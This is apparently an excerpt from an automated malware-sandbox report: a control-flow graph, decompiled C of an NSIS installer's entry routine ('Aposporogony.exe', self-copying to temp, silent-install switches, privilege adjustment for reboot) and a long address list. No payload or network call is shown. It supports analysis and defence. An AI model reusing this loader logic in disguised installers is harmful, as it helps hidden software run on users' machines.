                                                                                                                                                                                      control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 42 4035f2-4035fa 37->42 43 40360b-403644 37->43 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 47 403601 42->47 48 4035fc-4035ff 42->48 49 403661-40369b 43->49 50 403646-40364b 43->50 47->43 48->43 48->47 49->36 57 40369d-4036a1 49->57 50->49 56 40364d-403655 50->56 52->53 53->28 61 4036c0 53->61 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 62 403804-40380b call 403ad8 55->62 63 403775-403780 call 405cea 55->63 65 403657-40365a 56->65 66 40365c 56->66 57->36 59 4036c2-4036d0 call 4063e8 57->59 58->39 58->54 68 4036d5 59->68 61->68 74 403810 62->74 79 403782-4037b7 63->79 80 4037ce-4037d8 63->80 65->49 65->66 66->49 68->29 74->54 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->82 83 40399e-4039ac call 4067c2 77->83 85 4039d8 78->85 86 4039dc-4039e0 ExitProcess 78->86 84 4037b9-4037bd 79->84 87 403840-403854 call 4059b9 lstrcatW 80->87 88 4037da-4037e8 call 405dc5 80->88 82->83 102 4039ba-4039c5 ExitWindowsEx 83->102 103 4039ae-4039b8 83->103 93 4037c6-4037ca 84->93 94 4037bf-4037c4 84->94 85->86 100 403861-40387b lstrcatW lstrcmpiW 87->100 101 403856-40385c lstrcatW 87->101 88->54 99 4037ea-403800 call 4063e8 * 2 88->99 93->84 98 4037cc 93->98 94->93 94->98 98->80 99->62 100->54 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                      			_entry_() {
                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                                                      				WCHAR* _t60;
                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                      				void* _t65;
                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                      				int _t74;
                                                                                                                                                                                      				intOrPtr* _t75;
                                                                                                                                                                                      				int _t76;
                                                                                                                                                                                      				int _t78;
                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                      				void* _t122;
                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                      				intOrPtr _t146;
                                                                                                                                                                                      				intOrPtr _t147;
                                                                                                                                                                                      				intOrPtr* _t148;
                                                                                                                                                                                      				int _t150;
                                                                                                                                                                                      				void* _t153;
                                                                                                                                                                                      				int _t154;
                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                      				signed int _t163;
                                                                                                                                                                                      				signed int _t168;
                                                                                                                                                                                      				void* _t170;
                                                                                                                                                                                      				WCHAR* _t171;
                                                                                                                                                                                      				signed int _t174;
                                                                                                                                                                                      				signed int _t177;
                                                                                                                                                                                      				CHAR* _t178;
                                                                                                                                                                                      				void* _t181;
                                                                                                                                                                                      				int* _t183;
                                                                                                                                                                                      				void* _t191;
                                                                                                                                                                                      				char* _t192;
                                                                                                                                                                                      				void* _t195;
                                                                                                                                                                                      				void* _t196;
                                                                                                                                                                                      				void* _t242;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t170 = 0x20;
                                                                                                                                                                                      				_t150 = 0;
                                                                                                                                                                                      				 *(_t196 + 0x14) = 0;
                                                                                                                                                                                      				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                                      				 *(_t196 + 0x1c) = 0;
                                                                                                                                                                                      				SetErrorMode(0x8001); // executed
                                                                                                                                                                                      				_t51 = GetVersion() & 0xbfffffff;
                                                                                                                                                                                      				 *0x42a24c = _t51;
                                                                                                                                                                                      				if(_t51 != 6) {
                                                                                                                                                                                      					_t148 = E004067C2(0);
                                                                                                                                                                                      					if(_t148 != 0) {
                                                                                                                                                                                      						 *_t148(0xc00);
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t178 = "UXTHEME";
                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                      				L8:
                                                                                                                                                                                      				__imp__#17(_t191);
                                                                                                                                                                                      				__imp__OleInitialize(_t150); // executed
                                                                                                                                                                                      				 *0x42a318 = _t56;
                                                                                                                                                                                      				SHGetFileInfoW(0x4216e8, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
                                                                                                                                                                                      				E004063E8(0x429240, L"NSIS Error");
                                                                                                                                                                                      				_t60 = GetCommandLineW();
                                                                                                                                                                                      				_t192 = L"\"C:\\Users\\Arthur\\Desktop\\Aposporogony.exe\"";
                                                                                                                                                                                      				E004063E8(_t192, _t60);
                                                                                                                                                                                      				 *0x42a240 = 0x400000;
                                                                                                                                                                                      				_t62 = _t192;
                                                                                                                                                                                      				if(L"\"C:\\Users\\Arthur\\Desktop\\Aposporogony.exe\"" == 0x22) {
                                                                                                                                                                                      					_t62 =  &M00435002;
                                                                                                                                                                                      					_t170 = 0x22;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t154 = CharNextW(E00405CEA(_t62, _t170));
                                                                                                                                                                                      				 *(_t196 + 0x18) = _t154;
                                                                                                                                                                                      				_t65 =  *_t154;
                                                                                                                                                                                      				if(_t65 == _t150) {
                                                                                                                                                                                      					L33:
                                                                                                                                                                                      					_t171 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                                                                                                                      					GetTempPathW(0x400, _t171);
                                                                                                                                                                                      					_t67 = E00403474(_t154, 0);
                                                                                                                                                                                      					_t224 = _t67;
                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                      						L36:
                                                                                                                                                                                      						DeleteFileW(L"1033"); // executed
                                                                                                                                                                                      						_t69 = E00402F30(_t226,  *(_t196 + 0x1c)); // executed
                                                                                                                                                                                      						 *(_t196 + 0x10) = _t69;
                                                                                                                                                                                      						if(_t69 != _t150) {
                                                                                                                                                                                      							L48:
                                                                                                                                                                                      							E004039E6();
                                                                                                                                                                                      							__imp__OleUninitialize();
                                                                                                                                                                                      							_t238 =  *(_t196 + 0x10) - _t150;
                                                                                                                                                                                      							if( *(_t196 + 0x10) == _t150) {
                                                                                                                                                                                      								__eflags =  *0x42a2f4 - _t150;
                                                                                                                                                                                      								if( *0x42a2f4 == _t150) {
                                                                                                                                                                                      									L72:
                                                                                                                                                                                      									_t71 =  *0x42a30c;
                                                                                                                                                                                      									__eflags = _t71 - 0xffffffff;
                                                                                                                                                                                      									if(_t71 != 0xffffffff) {
                                                                                                                                                                                      										 *(_t196 + 0x10) = _t71;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									ExitProcess( *(_t196 + 0x10));
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
                                                                                                                                                                                      								__eflags = _t74;
                                                                                                                                                                                      								if(_t74 != 0) {
                                                                                                                                                                                      									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
                                                                                                                                                                                      									 *(_t196 + 0x34) = 1;
                                                                                                                                                                                      									 *(_t196 + 0x40) = 2;
                                                                                                                                                                                      									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t75 = E004067C2(4);
                                                                                                                                                                                      								__eflags = _t75 - _t150;
                                                                                                                                                                                      								if(_t75 == _t150) {
                                                                                                                                                                                      									L70:
                                                                                                                                                                                      									_t76 = ExitWindowsEx(2, 0x80040002);
                                                                                                                                                                                      									__eflags = _t76;
                                                                                                                                                                                      									if(_t76 != 0) {
                                                                                                                                                                                      										goto L72;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L71;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
                                                                                                                                                                                      									__eflags = _t78;
                                                                                                                                                                                      									if(_t78 == 0) {
                                                                                                                                                                                      										L71:
                                                                                                                                                                                      										E0040140B(9);
                                                                                                                                                                                      										goto L72;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L70;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E00405A4E( *(_t196 + 0x10), 0x200010);
                                                                                                                                                                                      							ExitProcess(2);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *0x42a260 == _t150) {
                                                                                                                                                                                      							L47:
                                                                                                                                                                                      							 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                                                                                                                                      							 *(_t196 + 0x14) = E00403AD8( *0x42a30c);
                                                                                                                                                                                      							goto L48;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t183 = E00405CEA(_t192, _t150);
                                                                                                                                                                                      						if(_t183 < _t192) {
                                                                                                                                                                                      							L44:
                                                                                                                                                                                      							_t235 = _t183 - _t192;
                                                                                                                                                                                      							 *(_t196 + 0x10) = L"Error launching installer";
                                                                                                                                                                                      							if(_t183 < _t192) {
                                                                                                                                                                                      								_t181 = E004059B9(_t238);
                                                                                                                                                                                      								lstrcatW(_t171, L"~nsu");
                                                                                                                                                                                      								if(_t181 != _t150) {
                                                                                                                                                                                      									lstrcatW(_t171, "A");
                                                                                                                                                                                      								}
                                                                                                                                                                                      								lstrcatW(_t171, L".tmp");
                                                                                                                                                                                      								_t194 = L"C:\\Users\\Arthur\\Desktop";
                                                                                                                                                                                      								if(lstrcmpiW(_t171, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                                                                                                                                      									_push(_t171);
                                                                                                                                                                                      									if(_t181 == _t150) {
                                                                                                                                                                                      										E0040599C();
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										E0040591F();
                                                                                                                                                                                      									}
                                                                                                                                                                                      									SetCurrentDirectoryW(_t171);
                                                                                                                                                                                      									_t242 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism" - _t150; // 0x43
                                                                                                                                                                                      									if(_t242 == 0) {
                                                                                                                                                                                      										E004063E8(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism", _t194);
                                                                                                                                                                                      									}
                                                                                                                                                                                      									E004063E8(0x42b000,  *(_t196 + 0x18));
                                                                                                                                                                                      									_t155 = "A" & 0x0000ffff;
                                                                                                                                                                                      									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                                                                                                                      									_t195 = 0x1a;
                                                                                                                                                                                      									do {
                                                                                                                                                                                      										E0040640A(_t150, _t171, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x120)));
                                                                                                                                                                                      										DeleteFileW(0x420ee8);
                                                                                                                                                                                      										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Aposporogony.exe", 0x420ee8, 1) != 0) {
                                                                                                                                                                                      											E004061AE(_t155, 0x420ee8, _t150);
                                                                                                                                                                                      											E0040640A(_t150, _t171, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x124)));
                                                                                                                                                                                      											_t102 = E004059D1(0x420ee8);
                                                                                                                                                                                      											if(_t102 != _t150) {
                                                                                                                                                                                      												CloseHandle(_t102);
                                                                                                                                                                                      												 *(_t196 + 0x10) = _t150;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										 *0x42b800 =  *0x42b800 + 1;
                                                                                                                                                                                      										_t195 = _t195 - 1;
                                                                                                                                                                                      									} while (_t195 != 0);
                                                                                                                                                                                      									E004061AE(_t155, _t171, _t150);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *_t183 = _t150;
                                                                                                                                                                                      							_t184 =  &(_t183[2]);
                                                                                                                                                                                      							if(E00405DC5(_t235,  &(_t183[2])) == 0) {
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E004063E8(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism", _t184);
                                                                                                                                                                                      							E004063E8(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism\\Scups", _t184);
                                                                                                                                                                                      							 *(_t196 + 0x10) = _t150;
                                                                                                                                                                                      							goto L47;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                      						_t158 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                                                                                                                      						_t119 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                                                                                                                      						while( *_t183 != _t158 || _t183[1] != _t119) {
                                                                                                                                                                                      							_t183 = _t183;
                                                                                                                                                                                      							if(_t183 >= _t192) {
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t150 = 0;
                                                                                                                                                                                      						goto L44;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					GetWindowsDirectoryW(_t171, 0x3fb);
                                                                                                                                                                                      					lstrcatW(_t171, L"\\Temp");
                                                                                                                                                                                      					_t122 = E00403474(_t154, _t224);
                                                                                                                                                                                      					_t225 = _t122;
                                                                                                                                                                                      					if(_t122 != 0) {
                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					GetTempPathW(0x3fc, _t171);
                                                                                                                                                                                      					lstrcatW(_t171, L"Low");
                                                                                                                                                                                      					SetEnvironmentVariableW(L"TEMP", _t171);
                                                                                                                                                                                      					SetEnvironmentVariableW(L"TMP", _t171);
                                                                                                                                                                                      					_t127 = E00403474(_t154, _t225);
                                                                                                                                                                                      					_t226 = _t127;
                                                                                                                                                                                      					if(_t127 == 0) {
                                                                                                                                                                                      						goto L48;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L36;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t153 = 0x20;
                                                                                                                                                                                      						if(_t65 != _t153) {
                                                                                                                                                                                      							L13:
                                                                                                                                                                                      							if( *_t154 == 0x22) {
                                                                                                                                                                                      								_t154 = _t154 + 2;
                                                                                                                                                                                      								_t153 = 0x22;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *_t154 != 0x2f) {
                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t154 = _t154 + 2;
                                                                                                                                                                                      								if( *_t154 == 0x53) {
                                                                                                                                                                                      									_t147 =  *((intOrPtr*)(_t154 + 2));
                                                                                                                                                                                      									if(_t147 == 0x20 || _t147 == 0) {
                                                                                                                                                                                      										 *0x42a300 = 1;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								asm("cdq");
                                                                                                                                                                                      								asm("cdq");
                                                                                                                                                                                      								_t168 = L"NCRC" & 0x0000ffff;
                                                                                                                                                                                      								asm("cdq");
                                                                                                                                                                                      								_t174 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t168;
                                                                                                                                                                                      								if( *_t154 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t174) {
                                                                                                                                                                                      									_t146 =  *((intOrPtr*)(_t154 + 8));
                                                                                                                                                                                      									if(_t146 == 0x20 || _t146 == 0) {
                                                                                                                                                                                      										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								asm("cdq");
                                                                                                                                                                                      								asm("cdq");
                                                                                                                                                                                      								_t163 = L" /D=" & 0x0000ffff;
                                                                                                                                                                                      								asm("cdq");
                                                                                                                                                                                      								_t177 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t163;
                                                                                                                                                                                      								if( *(_t154 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t177) {
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
                                                                                                                                                                                      									__eflags = _t154;
                                                                                                                                                                                      									E004063E8(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism", _t154);
                                                                                                                                                                                      									L32:
                                                                                                                                                                                      									_t150 = 0;
                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							L12:
                                                                                                                                                                                      							_t154 = _t154 + 2;
                                                                                                                                                                                      						} while ( *_t154 == _t153);
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      						L27:
                                                                                                                                                                                      						_t154 = E00405CEA(_t154, _t153);
                                                                                                                                                                                      						if( *_t154 == 0x22) {
                                                                                                                                                                                      							_t154 = _t154 + 2;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t65 =  *_t154;
                                                                                                                                                                                      					} while (_t65 != 0);
                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L4:
                                                                                                                                                                                      				E00406752(_t178); // executed
                                                                                                                                                                                      				_t178 =  &(_t178[lstrlenA(_t178) + 1]);
                                                                                                                                                                                      				if( *_t178 != 0) {
                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					E004067C2(0xa);
                                                                                                                                                                                      					 *0x42a244 = E004067C2(8);
                                                                                                                                                                                      					_t56 = E004067C2(6);
                                                                                                                                                                                      					if(_t56 != _t150) {
                                                                                                                                                                                      						_t56 =  *_t56(0x1e);
                                                                                                                                                                                      						if(_t56 != 0) {
                                                                                                                                                                                      							 *0x42a24f =  *0x42a24f | 0x00000040;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}








































                                                                                                                                                                                      0x004034b0
                                                                                                                                                                                      0x004034b1
                                                                                                                                                                                      0x004034b8
                                                                                                                                                                                      0x004034bc
                                                                                                                                                                                      0x004034c4
                                                                                                                                                                                      0x004034c8
                                                                                                                                                                                      0x004034d4
                                                                                                                                                                                      0x004034dd
                                                                                                                                                                                      0x004034e2
                                                                                                                                                                                      0x004034e5
                                                                                                                                                                                      0x004034ec
                                                                                                                                                                                      0x004034f3
                                                                                                                                                                                      0x004034f3
                                                                                                                                                                                      0x004034ec
                                                                                                                                                                                      0x004034f5
                                                                                                                                                                                      0x004034f5
                                                                                                                                                                                      0x0040353d
                                                                                                                                                                                      0x0040353e
                                                                                                                                                                                      0x00403545
                                                                                                                                                                                      0x0040354b
                                                                                                                                                                                      0x00403561
                                                                                                                                                                                      0x00403571
                                                                                                                                                                                      0x00403576
                                                                                                                                                                                      0x0040357c
                                                                                                                                                                                      0x00403583
                                                                                                                                                                                      0x00403590
                                                                                                                                                                                      0x0040359a
                                                                                                                                                                                      0x0040359c
                                                                                                                                                                                      0x004035a0
                                                                                                                                                                                      0x004035a5
                                                                                                                                                                                      0x004035a5
                                                                                                                                                                                      0x004035b4
                                                                                                                                                                                      0x004035b6
                                                                                                                                                                                      0x004035ba
                                                                                                                                                                                      0x004035c0
                                                                                                                                                                                      0x004036d7
                                                                                                                                                                                      0x004036dd
                                                                                                                                                                                      0x004036e8
                                                                                                                                                                                      0x004036ea
                                                                                                                                                                                      0x004036ef
                                                                                                                                                                                      0x004036f1
                                                                                                                                                                                      0x00403749
                                                                                                                                                                                      0x0040374e
                                                                                                                                                                                      0x00403758
                                                                                                                                                                                      0x0040375f
                                                                                                                                                                                      0x00403763
                                                                                                                                                                                      0x00403814
                                                                                                                                                                                      0x00403814
                                                                                                                                                                                      0x00403819
                                                                                                                                                                                      0x0040381f
                                                                                                                                                                                      0x00403824
                                                                                                                                                                                      0x0040394a
                                                                                                                                                                                      0x00403950
                                                                                                                                                                                      0x004039ce
                                                                                                                                                                                      0x004039ce
                                                                                                                                                                                      0x004039d3
                                                                                                                                                                                      0x004039d6
                                                                                                                                                                                      0x004039d8
                                                                                                                                                                                      0x004039d8
                                                                                                                                                                                      0x004039e0
                                                                                                                                                                                      0x004039e0
                                                                                                                                                                                      0x00403960
                                                                                                                                                                                      0x00403966
                                                                                                                                                                                      0x00403968
                                                                                                                                                                                      0x00403975
                                                                                                                                                                                      0x00403988
                                                                                                                                                                                      0x00403990
                                                                                                                                                                                      0x00403998
                                                                                                                                                                                      0x00403998
                                                                                                                                                                                      0x004039a0
                                                                                                                                                                                      0x004039a5
                                                                                                                                                                                      0x004039ac
                                                                                                                                                                                      0x004039ba
                                                                                                                                                                                      0x004039bd
                                                                                                                                                                                      0x004039c3
                                                                                                                                                                                      0x004039c5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004039ae
                                                                                                                                                                                      0x004039b4
                                                                                                                                                                                      0x004039b6
                                                                                                                                                                                      0x004039b8
                                                                                                                                                                                      0x004039c7
                                                                                                                                                                                      0x004039c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004039c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004039b8
                                                                                                                                                                                      0x004039ac
                                                                                                                                                                                      0x00403833
                                                                                                                                                                                      0x0040383a
                                                                                                                                                                                      0x0040383a
                                                                                                                                                                                      0x0040376f
                                                                                                                                                                                      0x00403804
                                                                                                                                                                                      0x00403804
                                                                                                                                                                                      0x00403810
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403810
                                                                                                                                                                                      0x0040377c
                                                                                                                                                                                      0x00403780
                                                                                                                                                                                      0x004037ce
                                                                                                                                                                                      0x004037ce
                                                                                                                                                                                      0x004037d0
                                                                                                                                                                                      0x004037d8
                                                                                                                                                                                      0x0040384b
                                                                                                                                                                                      0x0040384d
                                                                                                                                                                                      0x00403854
                                                                                                                                                                                      0x0040385c
                                                                                                                                                                                      0x0040385c
                                                                                                                                                                                      0x00403867
                                                                                                                                                                                      0x0040386c
                                                                                                                                                                                      0x0040387b
                                                                                                                                                                                      0x0040387f
                                                                                                                                                                                      0x00403880
                                                                                                                                                                                      0x00403889
                                                                                                                                                                                      0x00403882
                                                                                                                                                                                      0x00403882
                                                                                                                                                                                      0x00403882
                                                                                                                                                                                      0x0040388f
                                                                                                                                                                                      0x00403895
                                                                                                                                                                                      0x0040389c
                                                                                                                                                                                      0x004038a4
                                                                                                                                                                                      0x004038a4
                                                                                                                                                                                      0x004038b2
                                                                                                                                                                                      0x004038be
                                                                                                                                                                                      0x004038cc
                                                                                                                                                                                      0x004038d1
                                                                                                                                                                                      0x004038d7
                                                                                                                                                                                      0x004038e3
                                                                                                                                                                                      0x004038e9
                                                                                                                                                                                      0x004038f3
                                                                                                                                                                                      0x00403909
                                                                                                                                                                                      0x0040391a
                                                                                                                                                                                      0x00403920
                                                                                                                                                                                      0x00403927
                                                                                                                                                                                      0x0040392a
                                                                                                                                                                                      0x00403930
                                                                                                                                                                                      0x00403930
                                                                                                                                                                                      0x00403927
                                                                                                                                                                                      0x00403934
                                                                                                                                                                                      0x0040393b
                                                                                                                                                                                      0x0040393b
                                                                                                                                                                                      0x00403940
                                                                                                                                                                                      0x00403940
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040387b
                                                                                                                                                                                      0x004037da
                                                                                                                                                                                      0x004037dd
                                                                                                                                                                                      0x004037e8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004037f0
                                                                                                                                                                                      0x004037fb
                                                                                                                                                                                      0x00403800
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403800
                                                                                                                                                                                      0x00403789
                                                                                                                                                                                      0x004037a1
                                                                                                                                                                                      0x004037b2
                                                                                                                                                                                      0x004037b3
                                                                                                                                                                                      0x004037b7
                                                                                                                                                                                      0x004037b9
                                                                                                                                                                                      0x004037c7
                                                                                                                                                                                      0x004037ca
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004037ca
                                                                                                                                                                                      0x004037cc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004037cc
                                                                                                                                                                                      0x004036f9
                                                                                                                                                                                      0x00403705
                                                                                                                                                                                      0x0040370a
                                                                                                                                                                                      0x0040370f
                                                                                                                                                                                      0x00403711
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403719
                                                                                                                                                                                      0x00403721
                                                                                                                                                                                      0x00403732
                                                                                                                                                                                      0x0040373a
                                                                                                                                                                                      0x0040373c
                                                                                                                                                                                      0x00403741
                                                                                                                                                                                      0x00403743
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004035c6
                                                                                                                                                                                      0x004035c6
                                                                                                                                                                                      0x004035c8
                                                                                                                                                                                      0x004035cc
                                                                                                                                                                                      0x004035d5
                                                                                                                                                                                      0x004035d9
                                                                                                                                                                                      0x004035de
                                                                                                                                                                                      0x004035df
                                                                                                                                                                                      0x004035df
                                                                                                                                                                                      0x004035e4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004035ea
                                                                                                                                                                                      0x004035eb
                                                                                                                                                                                      0x004035f0
                                                                                                                                                                                      0x004035f2
                                                                                                                                                                                      0x004035fa
                                                                                                                                                                                      0x00403601
                                                                                                                                                                                      0x00403601
                                                                                                                                                                                      0x004035fa
                                                                                                                                                                                      0x00403612
                                                                                                                                                                                      0x00403625
                                                                                                                                                                                      0x00403626
                                                                                                                                                                                      0x0040363b
                                                                                                                                                                                      0x00403640
                                                                                                                                                                                      0x00403644
                                                                                                                                                                                      0x0040364d
                                                                                                                                                                                      0x00403655
                                                                                                                                                                                      0x0040365c
                                                                                                                                                                                      0x0040365c
                                                                                                                                                                                      0x00403655
                                                                                                                                                                                      0x00403668
                                                                                                                                                                                      0x0040367b
                                                                                                                                                                                      0x0040367c
                                                                                                                                                                                      0x00403691
                                                                                                                                                                                      0x00403697
                                                                                                                                                                                      0x0040369b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004036c2
                                                                                                                                                                                      0x004036c2
                                                                                                                                                                                      0x004036c7
                                                                                                                                                                                      0x004036d0
                                                                                                                                                                                      0x004036d5
                                                                                                                                                                                      0x004036d5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004036d5
                                                                                                                                                                                      0x0040369b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004035ce
                                                                                                                                                                                      0x004035ce
                                                                                                                                                                                      0x004035cf
                                                                                                                                                                                      0x004035d0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004036a3
                                                                                                                                                                                      0x004036aa
                                                                                                                                                                                      0x004036b0
                                                                                                                                                                                      0x004036b3
                                                                                                                                                                                      0x004036b3
                                                                                                                                                                                      0x004036b4
                                                                                                                                                                                      0x004036b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004036c0
                                                                                                                                                                                      0x004034fa
